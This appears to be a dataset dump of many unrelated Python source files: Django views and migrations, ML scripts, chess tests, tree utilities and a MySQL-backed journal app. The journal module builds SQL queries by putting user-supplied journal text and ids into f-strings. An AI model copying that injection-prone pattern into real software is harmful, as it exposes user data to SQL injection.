text stringlengths 8 6.05M |
|---|
from django.contrib import admin
from models import event, user_choices, choice
# Register your models here.
# Expose the poll models in the Django admin site.
# NOTE(review): lowercase model names (event, user_choices, choice) come from
# models.py; renaming them is out of scope here.
admin.site.register(event)
admin.site.register(user_choices)
admin.site.register(choice)
import torch
import torch.nn as nn
from torch.nn import init
from torch.utils.data import Dataset
import numpy as np
class Temporal_Dataset(Dataset):
    """Dataset of (node, node, time) rows loaded from a whitespace text file.

    Columns 0, 1 and 3 of the file are kept: two ids and a timestamp.
    Timestamps are shifted so the first row is 0 and divided by ``div``
    (the default 3600 presumably converts seconds to hours — confirm);
    both id columns are shifted down by ``starting``.
    """

    def __init__(self, file_name, starting=0, skip_rows=0, div=3600):
        raw = np.loadtxt(fname=file_name, skiprows=skip_rows)
        self.data = raw[:, [0, 1, 3]]
        # self.time is a view into column 2, so it tracks the rescale below.
        self.time = self.data[:, 2]
        self.trans_time = (self.time - self.time[0]) / div
        self.data[:, 2] = self.trans_time
        self.data[:, [0, 1]] = self.data[:, [0, 1]] - starting

    def __len__(self):
        # One sample per row of the loaded file.
        return len(self.time)

    def __getitem__(self, idx):
        # A sample is the full (id, id, rescaled-time) row.
        return self.data[idx, :]
|
#coding:utf-8
from django.conf.urls import patterns, url
# String view references inside patterns() are the pre-Django-1.10 URLconf
# style; kept as-is because this project clearly targets that Django era.
urlpatterns = patterns('',
    url(r'^$', 'collection.views.into_collection'),
    url(r'^list/$', 'collection.views.get_collection'),
    # Capture group (.+) is passed to the view as the collection identifier.
    url(r'^delete/(.+)$', 'collection.views.delete_collection'),
    url(r'^Clist/$', 'collection.views.into_a_collection'),
    url(r'^Clist/(.+)$', 'collection.views.get_a_collection'),
    url(r'^answer/check/$', 'collection.views.check_answer'),
    url(r'^note/$', 'collection.views.note'),
)
|
import sys


def main():
    """For each of T test cases, read M city names and print the number of
    distinct names.

    Fixes vs. the original: the inner loop reused the outer loop variable
    ``i`` (shadowing), and all reads ran at module import time, which made
    the script hang when imported; reads now go through sys.stdin inside
    main() so stdin can be substituted.
    """
    read = sys.stdin.readline
    cases = int(read().strip())
    for _ in range(cases):
        count = int(read().strip())
        # A set comprehension replaces the append-then-set-then-list dance.
        distinct = {read().strip() for _ in range(count)}
        print(len(distinct))


if __name__ == '__main__':
    main()
# Generated by Django 3.1.4 on 2021-01-16 18:35
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add two optional fields to Tag: checkbox_style and slug."""

    dependencies = [
        ('recipes', '0008_auto_20210109_1150'),
    ]
    operations = [
        migrations.AddField(
            model_name='tag',
            name='checkbox_style',
            field=models.CharField(blank=True, max_length=15),
        ),
        migrations.AddField(
            model_name='tag',
            name='slug',
            field=models.SlugField(blank=True),
        ),
    ]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Assignment in BMP course - DVB-T transport stream analyser
Author: Jakub Lukac
E-mail: xlukac09@stud.fit.vutbr.cz
Created: 14-10-2019
Testing: python3.6
"""
from ts import TransportStream
# TODO parse args
# TODO prepare output file name
# Parse the capture file; TransportStream consumes the open binary stream.
# NOTE(review): input file name is hard-coded pending the TODOs above.
with open("simple_multiplex.ts", "rb") as input_file:
    ts = TransportStream(input_file)
|
from django.shortcuts import render, get_object_or_404
from .models import LostItems
from django.core.paginator import Paginator
def HomePage(request):
    # Render the static landing page; no context needed.
    return render(request, 'HomePage.html', {})
def FindLost(request):
    """Paginated listing of lost items, newest find-date first."""
    queryset = LostItems.objects.all().order_by('-findYmd')  # fetch ordered by date
    page_number = request.GET.get('page')
    page_items = Paginator(queryset, 10).get_page(page_number)
    return render(request, 'FindLost.html', {'items': page_items})
def ItemDetail(request, pk):
    """Detail page for one lost item; 404 when pk is unknown."""
    found = get_object_or_404(LostItems, pk=pk)
    return render(request, 'ItemDetail.html', {'item': found})
def LabPage(request, pk):
    """Lab page rendered for one lost item; 404 when pk is unknown."""
    found = get_object_or_404(LostItems, pk=pk)
    return render(request, 'LabPage.html', {'item': found})
|
import pandas as pd
import numpy as np
from scipy.sparse import hstack
from sklearn.preprocessing import LabelBinarizer
from sklearn.cross_validation import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.linear_model import Ridge
from sklearn.metrics import accuracy_score
from sklearn.feature_extraction.text import TfidfVectorizer
# NOTE(review): Python 2 script (print statements) and it imports
# sklearn.cross_validation, which modern scikit-learn replaced with
# sklearn.model_selection — runnable only on the legacy stack.
data = pd.read_csv("trainingData.csv")
#data = data[0:1000]
# print data
questionValues = data["Question"].values
text = data["Text"].values
print "Extracting TFIDF features"
featureExtractor = TfidfVectorizer()
# fit_transform's return value is discarded; only the fitted vocabulary is kept.
featureExtractor.fit_transform(list(data["Text"]))
textTFIDF = featureExtractor.transform(list(data["Text"]))
# NOTE(review): the names look swapped — the *_categories pair holds the
# TF-IDF feature matrices and the *_questions pair holds the labels; confirm.
train_categories, test_categories, train_questions, test_questions = train_test_split(
    textTFIDF, questionValues)
print train_questions.mean()
print test_questions.mean()
model = LogisticRegression(C=1)
print "Fitting the Model"
model.fit(train_categories, train_questions)
output = model.predict(test_categories)
print output
textFeaturesPerf = accuracy_score(test_questions, output)
print textFeaturesPerf
|
import unittest
import ujson
import fakeredis
from freezegun import freeze_time
from pychess.chess import (
BLACK,
WHITE,
InvalidTurnException,
)
from manager import (
ChessManager,
BoardFactory,
InvalidBoardIdException,
InvalidTurnTokenException,
PlayingBoard,
)
class TestChessManager(unittest.TestCase):
    """Tests for ChessManager backed by an in-memory fake Redis.

    Each test gets a fresh FakeStrictRedis and one pre-created board
    ('white' vs 'black', 10 moves left).
    """

    def setUp(self):
        super(TestChessManager, self).setUp()
        self.fake_redis = fakeredis.FakeStrictRedis()
        self.manager = ChessManager(self.fake_redis)
        self.board_id = self.manager.create_board(
            white_username='white',
            black_username='black',
            move_left=10,
        )

    def test_get_invalid_board(self):
        """Looking up an unknown board id raises InvalidBoardIdException."""
        with self.assertRaises(InvalidBoardIdException):
            self.manager.get_board_by_id('hola-mundo')

    def test_save(self):
        """_save_board serializes the board to Redis as the expected JSON."""
        _board = BoardFactory.size_16()
        board_id = '1234567890'
        # Freeze time so the serialized 'created' timestamp is deterministic.
        with freeze_time('2020-10-20 13:15:32'):
            board = PlayingBoard(_board, 'white player', 'black player', 10)
            self.manager._save_board(board_id, board)
        self.assertTrue(self.fake_redis.exists('board:1234567890'))
        saved_boar_str = self.fake_redis.get('board:1234567890')
        restored_board = ujson.loads(saved_boar_str)
        # Initial 16x16 layout: two back ranks, two pawn ranks per side,
        # eight empty ranks in the middle (16 chars per rank).
        board_str = (
            ('rrhhbbqqkkbbhhrr' * 2) +
            ('pppppppppppppppp' * 2) +
            ('                ' * 8) +
            ('PPPPPPPPPPPPPPPP' * 2) +
            ('RRHHBBQQKKBBHHRR' * 2)
        )
        expected_board = {
            'board': {
                'actual_turn': 'white',
                'size': 16,
                'board': board_str
            },
            'white_username': 'white player',
            'black_username': 'black player',
            'turn_token': None,
            'board_id': None,
            'white_score': 0,
            'black_score': 0,
            'move_left': 10,
            'created': '2020-10-20 13:15:32',
        }
        self.assertEqual(
            restored_board,
            expected_board,
        )

    def test_create_board(self):
        """A freshly created board starts on white's turn with zero scores."""
        board = self.manager.get_board_by_id(self.board_id)
        self.assertIsNotNone(board)
        self.assertEqual(board.board.actual_turn, WHITE)
        self.assertEqual(board.white_score, 0)
        self.assertEqual(board.black_score, 0)
        self.assertTrue(self.fake_redis.exists('board:{}'.format(self.board_id)))

    def test_invalid_move(self):
        """Moving a black piece on white's turn raises and changes nothing."""
        with self.assertRaises(InvalidTurnException):
            self.manager.move(self.board_id, 2, 3, 3, 3)
        board = self.manager.get_board_by_id(self.board_id)
        self.assertIsNotNone(board)
        self.assertEqual(board.board.actual_turn, WHITE)
        self.assertEqual(board.white_score, 0)
        self.assertEqual(board.black_score, 0)

    def test_move(self):
        """A valid white move passes the turn to black and scores 10."""
        self.manager.move(self.board_id, 12, 3, 11, 3)
        board = self.manager.get_board_by_id(self.board_id)
        self.assertIsNotNone(board)
        self.assertEqual(board.board.actual_turn, BLACK)
        self.assertEqual(board.black_score, 0)
        self.assertEqual(board.white_score, 10)

    def test_start_game(self):
        """challenge() returns a token for the new game."""
        turn_token = self.manager.challenge('user1', 'user2', 10)
        self.assertIsNotNone(turn_token)

    def test_move_with_turn_token(self):
        """Turn tokens rotate per move; a used token is rejected."""
        board_id = self.manager.challenge('user1', 'user2', 10)
        first_turn_token, white_username, actual_turn_color, board, move_left = self.manager.challenge_accepted(board_id)
        # initial board turn should be WHITE
        self.assertEqual(actual_turn_color, WHITE)
        self.assertEqual(move_left, 9)
        # move WHITE with token
        second_turn_token, black_username, actual_turn_color, board, move_left = self.manager.move_with_turn_token(first_turn_token, 12, 3, 11, 3)
        # second board turn should be BLACK
        self.assertEqual(actual_turn_color, BLACK)
        self.assertEqual(move_left, 8)
        # invalid turn token exception
        with self.assertRaises(InvalidTurnTokenException):
            self.manager.move_with_turn_token(first_turn_token, 12, 4, 11, 4)
        # move BLACK with token
        third_turn_token, white_username, actual_turn_color, board, move_left = self.manager.move_with_turn_token(second_turn_token, 3, 3, 4, 3)
        self.assertIsNotNone(third_turn_token)
        self.assertEqual(actual_turn_color, WHITE)
        self.assertEqual(move_left, 7)

    def test_save_user_stats(self):
        """_save_user_stats appends one entry per player to their stats list."""
        board = self.manager.get_board_by_id(self.board_id)
        self.manager._save_user_stats(board)
        self.assertTrue(
            self.fake_redis.exists(self.manager.get_user_stats_key('white'))
        )
        self.assertTrue(
            self.fake_redis.exists(self.manager.get_user_stats_key('black'))
        )
        self.assertEqual(
            self.fake_redis.llen(self.manager.get_user_stats_key('white')),
            1,
        )
        self.assertEqual(
            self.fake_redis.llen(self.manager.get_user_stats_key('black')),
            1,
        )


if __name__ == '__main__':
    unittest.main()
|
from django import forms
from django.contrib.auth.forms import PasswordResetForm, UserCreationForm, AuthenticationForm
from django.utils.translation import gettext_lazy as _
from django.contrib.auth import get_user_model
from captcha.fields import ReCaptchaField
from django.conf import settings
class CaptchaPasswordResetForm(PasswordResetForm):
    """Password-reset form with an optional ReCaptcha field.

    The captcha field is only declared when both ReCaptcha keys are
    configured in settings; otherwise the attribute is None.
    # NOTE(review): relies on Django's form metaclass ignoring a None
    # class attribute (it only collects Field instances) — confirm.
    """

    captcha = (
        ReCaptchaField()
        if settings.RECAPTCHA_PUBLIC_KEY != '' and settings.RECAPTCHA_PRIVATE_KEY != ''
        else None
    )

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Focus the email input as soon as the page loads.
        self.fields['email'].widget.attrs.update({'autofocus': 'autofocus'})

    def get_users(self, email):
        # removed check verifying if password is unusable
        # (so, unlike the stock implementation, accounts with unusable
        # passwords also receive reset emails)
        user_model = get_user_model()
        active_users = user_model._default_manager.filter(**{
            '%s__iexact' % user_model.get_email_field_name(): email,
            'is_active': True,
        })
        return active_users
class UsernameOrEmailAuthenticationForm(AuthenticationForm):
    """Login form whose username field is labelled for username-or-email input."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.fields['username'].label = _("Username / Email")
class UserCreationForm(UserCreationForm):
    """
    A UserCreationForm with optional password inputs.

    Either both password fields are filled in, or both are left empty;
    a lone value in one field is rejected by clean_password2.
    """

    def __init__(self, *args, **kwargs):
        super(UserCreationForm, self).__init__(*args, **kwargs)
        self.fields['password1'].required = False
        self.fields['password2'].required = False
        # If one field gets autocompleted but not the other, our 'neither
        # password nor both passwords' validation will be triggered.
        self.fields['password1'].widget.attrs['autocomplete'] = 'off'
        self.fields['password2'].widget.attrs['autocomplete'] = 'off'

    def clean_password2(self):
        """Validate that the passwords match and were supplied as a pair."""
        password1 = self.cleaned_data.get("password1")
        password2 = self.cleaned_data.get("password2")
        if password1 and password2 and password1 != password2:
            raise forms.ValidationError(
                self.error_messages['password_mismatch'],
                code='password_mismatch',
            )
        # XOR: exactly one of the two fields was filled in.
        if bool(password1) ^ bool(password2):
            raise forms.ValidationError("Fill out both fields")
        return password2
# Generated by Django 2.2 on 2020-02-14 09:35
from django.db import migrations, models
class Migration(migrations.Migration):
    """Point user_signup.profileimg uploads at the images/ directory."""

    dependencies = [
        ('trading', '0010_user_signup_profileimg'),
    ]
    operations = [
        migrations.AlterField(
            model_name='user_signup',
            name='profileimg',
            field=models.ImageField(upload_to='images/'),
        ),
    ]
|
"""empty message
Revision ID: 0ba15ddf5053
Revises: 2013e180c438
Create Date: 2019-11-13 17:26:36.584040
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = '0ba15ddf5053'
down_revision = '2013e180c438'
branch_labels = None
depends_on = None
def upgrade():
    """Apply: add milestone.days_estimated; make date_estimated nullable."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.add_column('milestone', sa.Column('days_estimated', sa.String(length=255), nullable=True))
    op.alter_column('milestone', 'date_estimated',
               existing_type=postgresql.TIMESTAMP(),
               nullable=True)
    # ### end Alembic commands ###
def downgrade():
    """Revert: make date_estimated NOT NULL again; drop days_estimated."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.alter_column('milestone', 'date_estimated',
               existing_type=postgresql.TIMESTAMP(),
               nullable=False)
    op.drop_column('milestone', 'days_estimated')
    # ### end Alembic commands ###
|
def swap(matrix, row1, row2, *columns):
    """Return a copy of `matrix` with the entries in the given `columns`
    exchanged between `row1` and `row2`.

    Bug fix: the original did `list(matrix)`, a *shallow* copy — the rows
    were shared with the caller, so despite returning a "copy" it still
    mutated the input. Rows are now copied as well, leaving `matrix`
    untouched.
    """
    result = [list(row) for row in matrix]
    for col in columns:
        result[row1][col], result[row2][col] = result[row2][col], result[row1][col]
    return result
|
import logging
import asyncio
import os
import json
import time
from datetime import datetime
import aiomysql as aiomysql
from aiohttp import web
logging.basicConfig(level=logging.INFO)


def index(request):
    # Minimal aiohttp handler returning a static HTML body.
    return web.Response(body=b'<h1>Awesome</h1>')
@asyncio.coroutine
def init(loop):
    """Create the aiohttp app and start listening on 127.0.0.1:9000.

    NOTE(review): @asyncio.coroutine / yield-from is the legacy pre-async/await
    coroutine style (removed in Python 3.11) — confirm the target interpreter.
    """
    app = web.Application(loop=loop)
    app.router.add_route('GET', '/test', index)
    srv = yield from loop.create_server(app.make_handler(), '127.0.0.1', 9000)
    logging.info('server started at http://127.0.0.1:9000...')
    return srv
# NOTE(review): in the original, these three run-the-loop lines came *before*
# the create_pool definition; loop.run_forever() never returns, so the code
# after it was unreachable and create_pool was never defined. Definitions now
# precede the blocking calls.
@asyncio.coroutine
def create_pool(loop, **kw):
    """Create the module-global aiomysql connection pool.

    Required kw keys: user, password, db. Optional: host (localhost),
    port (3306), charset (utf8), autocommit (True), maxsize (10), minsize (1).
    """
    logging.info('create database connection pool...')
    global __pool
    __pool = yield from aiomysql.create_pool(host=kw.get('host', 'localhost'),
                                             port=kw.get('port', 3306),
                                             user=kw['user'],
                                             password=kw['password'],
                                             db=kw['db'],
                                             charset=kw.get('charset', 'utf8'),
                                             autocommit=kw.get('autocommit', True),
                                             maxsize=kw.get('maxsize', 10),
                                             minsize=kw.get('minsize', 1),
                                             loop=loop)


loop = asyncio.get_event_loop()
loop.run_until_complete(init(loop))
loop.run_forever()
|
class LinkedList:
    """Singly linked list node; add() appends at the tail by recursion.

    Idiom fixes vs. the original: `== None` comparisons replaced with
    `is None` identity checks (behavior-identical here, but correct even
    if a payload type overrides __eq__).
    """

    next = None  # following node, or None at the tail
    val = None   # payload stored in this node

    def __init__(self, val):
        self.val = val

    def add(self, val):
        """Append `val` in a new node at the end of the chain."""
        if self.next is None:
            self.next = LinkedList(val)
        else:
            self.next.add(val)

    def __str__(self):
        # Renders as "(v1)(v2)...None"; the trailing None is str(tail.next).
        return "({val})".format(val=self.val) + str(self.next)
class BinaryTree:
    """Plain binary tree node exposing val, left and right attributes."""

    val = None
    left = None
    right = None

    def __init__(self, val):
        self.val = val

    def __str__(self):
        # Multi-line debug rendering; children print recursively (or None).
        parts = {"val": self.val, "left": self.left, "right": self.right}
        return "<Binary Tree (val is {val}). \n\tleft is {left} \n\tright is {right}>".format(**parts)
def depth(tree):
    """Return the number of nodes on the longest root-to-leaf path.

    An empty (None) tree has depth 0; a single leaf has depth 1.
    """
    if tree is None:
        return 0
    return 1 + max(depth(tree.left), depth(tree.right))
def tree_to_linkedlist(tree, lists=None, d=None):
    """Collect tree values into one LinkedList per depth level.

    Returns a dict mapping remaining-depth (root level == depth(tree),
    leaves == 1) to a LinkedList of the values found at that level.

    Bug fix: the original used the mutable default argument ``lists={}``,
    so successive top-level calls shared (and kept appending to) the same
    dict; the default is now None and a fresh dict is created per call.
    """
    if lists is None:
        lists = {}
    if d is None:
        d = depth(tree)
    # Append this node's value to the list for its level.
    if lists.get(d) is None:
        lists[d] = LinkedList(tree.val)
    else:
        lists[d].add(tree.val)
    if d == 1:
        return lists
    if tree.left is not None:
        lists = tree_to_linkedlist(tree.left, lists, d-1)
    if tree.right is not None:
        lists = tree_to_linkedlist(tree.right, lists, d-1)
    return lists
if __name__ == '__main__':
    # Build a small demo tree and print the linked list found at each depth.
    mainTree = BinaryTree(1)
    someSubTrees = {"left": BinaryTree(2), "right": BinaryTree(3)}
    someSubTrees["left"].left = BinaryTree(4)
    someSubTrees["left"].right = BinaryTree(5)
    someSubTrees["right"].left = BinaryTree(6)
    someSubTrees["right"].right = BinaryTree(7)
    someSubTrees["right"].right.right = BinaryTree(8)
    someSubTrees["left"].left.left = BinaryTree(9)
    mainTree.left = someSubTrees["left"]
    mainTree.right = someSubTrees["right"]
    ttll = tree_to_linkedlist(mainTree)
    # Fix: dict.iteritems() and the bare print statement are Python 2 only;
    # the class/function definitions above are Python 3 compatible, so use
    # the Python 3 equivalents for consistency.
    for depthLevel, linkedList in ttll.items():
        print("{0} {1}".format(depthLevel, linkedList))
from docx.table import Table
from docx.text.paragraph import Paragraph
def print_children(indent, node):
    # Recursively print the element tree, one .name per line, indented one
    # space per nesting level.  (Python 2 print statements throughout.)
    for ch in node.children:
        print ' '*indent, ch.name
        print_children(indent+1, ch)
def print_block(block):
    # Dispatch on the docx block type; other block types are ignored.
    if isinstance(block, Paragraph):
        print_paragraph(block)
    if isinstance(block, Table):
        print_table(block)
def print_paragraph(p):
    # Emit the paragraph's plain text.
    print p.text
def print_cell(cell):
    # A table cell contains paragraphs; print each.
    for p in cell.paragraphs:
        print_paragraph(p)
def print_table(t):
    # Walk the table row by row, cell by cell.
    for row in t.rows:
        for cell in row.cells:
            print_cell(cell)
def print_block_type_count(n):
    # Print "<name> <table count> <paragraph count>" for a node's blocks.
    table_count = 0
    paragraph_count = 0
    for b in n.blocks:
        if isinstance(b, Paragraph):
            paragraph_count += 1
        if isinstance(b, Table):
            table_count += 1
    print n.name, table_count, paragraph_count
|
import csv
from lxml import etree
from collections import defaultdict
with open("../work/done.csv") as csvfile:
    network_dict = csv.DictReader(csvfile, delimiter=";")
# NOTE(review): DictReader reads lazily — the main loop below must run while
# csvfile is still open (i.e. inside this with-block); confirm the original
# indentation, which this dump does not preserve reliably.
# Nested counter dicts: {outer_class: {inner_class: count}}.
dictionnaire_estrada = {}
dictionnaire_milo = {}
dictionnaire_milo_estrada ={}
dictionnaire_gen_category ={}
dictionnaire_gen_estrada ={}
dictionnaire_gen_milo ={}
dictionnaire_complet={}
def add(dico, key, key2):
    """Increment the nested counter dico[key][key2], creating missing levels."""
    bucket = dico.setdefault(key, {})
    bucket[key2] = bucket.get(key2, 0) + 1
# Tally class/category co-occurrences from each network's *_results.xml.
for network in network_dict:
    try:
        # Only small networks (under 1000 nodes) are analysed.
        if int(network['nb_nodes']) < 1000 :
            path_to_file = "../work/files/" + network['number'] + "-" + network['name'] + "/" + network['name']
            tree = etree.parse(path_to_file + "_results.xml")
            results = tree.getroot()
            category = str(results.find("category").get("type"))
            gen2 = results.find("gen")
            gen = str(gen2.find("classe_gen").get("classe"))
            #print gen
            add(dictionnaire_gen_category,gen,category)
            #if results.find("motifs") is not None or results.find("estrada_score") is not None :
            if results.find("estrada_score") is not None :
                classe = str(results.find("estrada_score").find("classe").get("score"))
                #print("['"+classe+"' , '"+category+"' , 1]")
                add(dictionnaire_estrada,classe,category)
                add(dictionnaire_gen_estrada,classe,gen)
            if results.find("motifs") is not None:
                milo = results.find("motifs").find("classe_milo")
                if milo is not None :
                    milo_classe = str(milo.get("classe"))
                    add(dictionnaire_gen_milo,milo_classe,gen)
                    add(dictionnaire_milo,milo_classe,category)
            # Networks with both scores also get a full record for the PDF table.
            if results.find("motifs") is not None and results.find("estrada_score") is not None :
                #print "1"
                estrada_classe = str(results.find("estrada_score").find("classe").get("score"))
                milo_classe = str(results.find("motifs").find("classe_milo").get("classe"))
                add(dictionnaire_milo_estrada,milo_classe,estrada_classe)
                dictionnaire_complet[network['name']]={}
                dictionnaire_complet[network['name']]["ep"]=round(float(results.find("estrada_score").find("eplus").get("score")),2)
                dictionnaire_complet[network['name']]["em"]=round(float(results.find("estrada_score").find("eminus").get("score")),2)
                dictionnaire_complet[network['name']]["mclass"]=milo_classe
                dictionnaire_complet[network['name']]["eclass"]=estrada_classe
    # Missing XML elements surface as AttributeError (None.find/.get);
    # such networks are silently skipped by design.
    except AttributeError:
        pass
def print_pdf():
    # Emit one LaTeX \tableline row per fully-scored network.
    # (Python 2 only: dict.iteritems().)
    for network,data in dictionnaire_complet.iteritems() :
        name = network.replace("_","-")
        print("\\tableline{"+name+"}{"+str(data["ep"])+"}{"+str(data["em"])+"}{"+data["eclass"]+"}{"+name+"}{"+data["mclass"]+"}\\\\")
def print_estrada():
    """Dump the estrada-class/category counters, one JS-array row per entry.

    The body was an exact copy of the generic helper print_2 (also duplicated
    in print_milo and print_milo_estrada); delegate instead of keeping a
    third copy.
    """
    print_2(dictionnaire_estrada)
def print_milo():
    """Dump the milo-class/category counters via the shared print_2 helper
    (the body duplicated print_2 verbatim)."""
    print_2(dictionnaire_milo)
def print_milo_estrada():
    """Dump the milo-class/estrada-class counters via the shared print_2
    helper (the body duplicated print_2 verbatim)."""
    print_2(dictionnaire_milo_estrada)
def print_2(dictionnaire):
    """Print one "['inner' , 'outer' , count]," JS-array row per nested entry.

    Fix: use dict.items() instead of the Python-2-only iteritems(), making
    this helper work on both Python 2 and Python 3.
    """
    for classe,item in dictionnaire.items():
        for category,number in item.items():
            print("['"+category+"' , '"+classe+"' , "+str(number)+"],")
def print_gen():
    # Dump all three gen-related counter tables in sequence.
    print_2(dictionnaire_gen_estrada)
    print_2(dictionnaire_gen_category)
    print_2(dictionnaire_gen_milo)
# Script entry point: only the LaTeX table is emitted by default.
print_pdf()
import json
from pathlib import Path
from PIL import Image
from util.dataset_logger import dataset_logger as logger
from util.db.Wrappers import MongoWrapper as db
from util.db.model import RawEntry, SanitizedEntry
# Output layout: dump/dataset/images next to this file; crops land in sanimg.
p = Path(__file__).parent / 'dump' / "dataset"
sanimg = p / "images"
db_wrapper = db.MongoWrapper()
def crop_image(img: Image, meta: SanitizedEntry, idx: int):
    """Crop `img` to the entry's bounding box and save it under sanimg.

    The file name encodes reddit id, weight (dots replaced by dashes),
    age and the crop index. Returns the path written.
    """
    name = f'{meta.reddit_id}_{str(meta.weight).replace(".", "-")}_{meta.age}_{idx}.jpg'
    target = sanimg / name
    cropped = img.crop(meta.bounding_box.to_tuple())
    cropped.save(target)
    return target
def get_features_in_crop(r: "RawEntry", s: "SanitizedEntry"):
    """Return the feature keys of `r` for which at least one raw bounding
    box lies inside the sanitized crop `s`.

    Bug fix: the accumulator set was re-created on every key iteration, so
    at most one key's features could ever be reported; it now accumulates
    across all keys. (Annotations are string forward-refs so the function
    is importable without the project model types.)
    """
    crop_features = set()
    for key, metas in r.raw_meta.items():
        if any(s.bounding_box.contains(m.bounding_box) for m in metas):
            crop_features.add(key)
    return list(crop_features)
if __name__ == "__main__":
if not sanimg.is_dir():
sanimg.mkdir(parents=True, exist_ok=True)
metadata = []
errors = 0
with db_wrapper.session_scope():
for r in RawEntry.objects(has_been_sanitized=True):
try:
img = Image.open(r.local_path)
for idx, s in enumerate(r.sanitized_entries):
img_path = crop_image(img, s, idx)
obj = {
"weight": float(s.weight),
"age": s.age,
"sex": r.sex,
"reddit_id": r.reddit_id,
"features": get_features_in_crop(r, s),
"path": img_path.name
}
metadata.append(obj)
except Exception as e:
logger.error(f"{img_path} crashed with {e}")
errors += 1
logger.info(f"Had {errors} errors")
with open(p / "meta.json", "w") as d:
json.dump(metadata, d)
|
import json
import nlp_utils as nlp
from datetime import date
import mysql.connector as connector
from app_config import MYSQL_PASSWORD
def get_conn_cursor():
    """Open a fresh connection to the local 'euva' MySQL database.

    Returns (connection, cursor); the caller is responsible for closing
    both (see close_conn_cursor / execute).
    """
    conn = connector.connect(
        host='localhost',
        database='euva',
        user='root',
        password=MYSQL_PASSWORD)
    cursor = conn.cursor()
    return conn, cursor
def close_conn_cursor(conn, cursor):
    """Close the cursor first, then its connection."""
    cursor.close()
    conn.close()
def execute(cmd, fetch=None, commit=False, params=None):
    """Run one SQL statement on a fresh connection and close it afterwards.

    Parameters
    ----------
    cmd : str
        The SQL statement.
    fetch : 'all' | 'one' | None
        What to fetch after executing (None fetches nothing).
    commit : bool
        Commit the transaction (required for writes).
    params : tuple | None
        NEW, optional, trailing (fully backward-compatible): values for
        %s placeholders in `cmd`, letting callers avoid f-string SQL and
        the injection risk that comes with it.

    Returns the fetched rows, a single row, or None.
    """
    returnable = None
    conn, cursor = get_conn_cursor()
    if params is None:
        cursor.execute(cmd)
    else:
        cursor.execute(cmd, params)
    if commit:
        conn.commit()
    if fetch == 'all':
        returnable = cursor.fetchall()
    elif fetch == 'one':
        returnable = cursor.fetchone()
    close_conn_cursor(conn, cursor)
    return returnable
def create_user(userinfo):
    """Create the per-user journal table user_<id> unless it already exists."""
    _id = userinfo['id']
    for table in execute('SHOW TABLES', fetch='all'):
        if table[0].replace('user_', '') == _id: return
    # NOTE(review): _id is interpolated into DDL (table names cannot be
    # parameterized) — ensure upstream guarantees it is a trusted identifier.
    execute(f'CREATE TABLE user_{_id}(journal_date DATE NOT NULL PRIMARY KEY, journal_entry TEXT NOT NULL, sentiment_score DECIMAL(4, 2) ZEROFILL NOT NULL)', commit=True)
def today_journal_blocks(userinfo):
    """Return today's stored journal JSON for the user, or a fresh
    editor.js header block when no (non-empty) entry exists yet."""
    _id = userinfo['id']
    journal_entry = execute(f'SELECT journal_entry FROM user_{_id} WHERE journal_date="{date.today()}"', fetch='one')
    if not journal_entry is None:
        # Undo the stored-form replacements before parsing as JSON.
        journal_entry = nlp.replace_journal(journal_entry[0], (1, 0)).replace(' ', ' ')
        journal_entry = json.loads(journal_entry)
        # Only a non-empty blocks list counts as an existing entry.
        if journal_entry['blocks']:
            return execute(f'SELECT journal_entry FROM user_{_id} WHERE journal_date="{date.today()}"', fetch='one')[0]
    return str({'blocks': [{'type': 'header', 'data': {'text': 'Journal - ' + date.today().strftime('%B %d, %Y'), 'level': 2}}]})
def save_journal_entry(userinfo, form):
    """Insert or update today's journal row for the user; returns True."""
    _id = userinfo['id']
    journal_entry = json.loads(form['journal-entry-input'].replace(' ', ' '))
    # Drop editor metadata before scoring/storing.
    del journal_entry['time']
    del journal_entry['version']
    sentiment_score = nlp.sentiment_score(journal_entry)
    journal_entry = nlp.replace_journal(json.dumps(journal_entry), (0, 1))
    # NOTE(review): journal_entry is interpolated straight into SQL — prefer
    # the parameterized form (execute(..., params=...)) to avoid injection.
    for journal_date in execute(f'SELECT journal_date FROM user_{_id}', fetch='all'):
        if journal_date[0].strftime('%Y-%m-%d') == str(date.today()):
            # A row for today already exists: update it.
            execute(f'UPDATE user_{_id} SET journal_entry="{journal_entry}", sentiment_score={sentiment_score} WHERE journal_date="{date.today()}"', commit=True)
            return True
    execute(f'INSERT INTO user_{_id}(journal_date, journal_entry, sentiment_score) values("{date.today()}", "{journal_entry}", {sentiment_score})', commit=True)
    return True
def journal_from_date(user_id, journal_date):
    """Return (journal_entry, sentiment_score) for the given ISO date string,
    or the string 'Invalid Date' when the user has no entry for it."""
    journal_dates = execute(f'SELECT journal_date FROM user_{user_id}', fetch='all')
    for db_date in journal_dates:
        if db_date[0].strftime('%Y-%m-%d') == journal_date:
            return execute(f'SELECT journal_entry, sentiment_score FROM user_{user_id} WHERE journal_date="{journal_date}"', fetch='one')
    return 'Invalid Date'
def journal_from_dates(user_id, dates):
    """Return the ISO string of the first date in `dates` that matches one
    of the user's stored journal dates, or None when there is no match.

    Fix: the original inner loop variable was named `date`, shadowing the
    `datetime.date` imported at module level; renamed to `candidate`.
    """
    journal_dates = execute(f'SELECT journal_date FROM user_{user_id}', fetch='all')
    for journal_date in journal_dates:
        for candidate in dates:
            if candidate.strftime('%Y-%m-%d') == journal_date[0].strftime('%Y-%m-%d'):
                return candidate.strftime('%Y-%m-%d')
def last_five_journals(userinfo):
    """Return [iso_date, float_score, 'Mon DD'] rows for the user's journals.

    NOTE(review): despite the name, this returns *all* rows, not the last
    five — confirm whether a caller slices the result.
    """
    _id = userinfo['id']
    dataset = execute(f'SELECT journal_date, sentiment_score FROM user_{_id}', fetch='all')
    for i in range(len(dataset)):
        # Convert each row tuple into [iso_date, float(score), short label].
        dataset[i] = list(dataset[i])
        dataset[i].append(dataset[i][0].strftime('%b %d'))
        dataset[i][0] = dataset[i][0].strftime('%Y-%m-%d')
        dataset[i][1] = float(dataset[i][1])
    return dataset
def sentiment_scores(userinfo):
    """Return all of the user's sentiment scores as floats."""
    _id = userinfo['id']
    return [float(s[0]) for s in execute(f'SELECT sentiment_score FROM user_{_id}', fetch='all')]
def latest_journal_date():
